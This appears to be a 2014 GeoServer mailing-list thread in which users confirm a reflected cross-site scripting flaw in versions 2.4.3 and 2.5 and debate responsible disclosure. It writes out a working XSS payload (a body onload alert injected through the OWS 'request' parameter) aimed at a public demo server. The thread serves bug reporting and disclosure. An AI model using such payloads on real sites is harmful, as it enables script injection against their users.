This one:
http://demo.opengeo.org/geoserver/ows?SERVICE=WMS&request=";><a%20xmlns:a=%27
> http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%
> 27xss%27%29"/></a><"
triggers on my 2.5-snapshot (8th May) and my 2.4.3.
None of the others trigger on either 2.4.3 or the snapshot for me.
===========
I'm not sure I'd agree with Andrea's assessment of there only being two
ways to divulge a bug. Per my original post, there is the third way:
Responsible disclosure, and it is compatible with Open Source. The notion
behind it is that only developers get informed of the bug until a patch is
ready so as to minimise the risk of raising awareness\use by blackhats
before it can be defended against. Once a patch is developed (in a timely
fashion!), information is disclosed to all.
There are advantages and disadvantages to all methods.
Cheers,
Jonathan
On 9 May 2014 16:30, Russell Hore <[email protected]> wrote:
> I just tried that on my 2.5 box and got a popup with css in it.
>
>
> - Build Information
> - Version 2.5
> - Git Revision 8cf3edcf5f61db010f7ad3fcb4613e7c0eabeaff
> - Build Date 18-Mar-2014 16:08
> - GeoTools Version 11.0 (rev
> fb9a2d3f88315d076523788cb8196ec89bb253f9)
> - GeoWebCache Version 1.5.1 (rev
> 1.5.x/64246c20a4ada1c954b17d23b9447408d1c5432f)
>
>
>
> Russ
>
> On 9 May 2014, at 16:17, Isakson Mats <[email protected]> wrote:
>
>
> http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=";><a%20xmlns:a=%27http://www.w3.org/1999/xhtml%27><a:body%20onload="alert%28%27xss%27%29"/></a><"&VERSION=1.0<http://demo.opengeo.org/geoserver/ows?SERVICE=WFS&request=%22%3e%3ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3e%3ca:body%20onload=%22alert%28%27xss%27%29%22/%3e%3c/a%3e%3c%22&VERSION=1.0>
>
>
>
>
> ------------------------------------------------------------------------------
> Is your legacy SCM system holding you back? Join Perforce May 7 to find
> out:
> • 3 signs your SCM is hindering your productivity
> • Requirements for releasing software faster
> • Expert tips and advice for migrating your SCM now
> http://p.sf.net/sfu/perforce
> _______________________________________________
> Geoserver-users mailing list
> [email protected]
> https://lists.sourceforge.net/lists/listinfo/geoserver-users
>
>
--
This transmission is intended for the named addressee(s) only and may
contain confidential, sensitive or personal information and should be
handled accordingly. Unless you are the named addressee (or authorised to
receive it for the addressee) you may not copy or use it, or disclose it to
anyone else. If you have received this transmission in error please notify
the sender immediately. All email traffic sent to or from us, including
without limitation all GCSX traffic, may be subject to recording and/or
monitoring in accordance with relevant legislation.
------------------------------------------------------------------------------
Is your legacy SCM system holding you back? Join Perforce May 7 to find out:
• 3 signs your SCM is hindering your productivity
• Requirements for releasing software faster
• Expert tips and advice for migrating your SCM now
http://p.sf.net/sfu/perforce
_______________________________________________
Geoserver-users mailing list
[email protected]
https://lists.sourceforge.net/lists/listinfo/geoserver-users
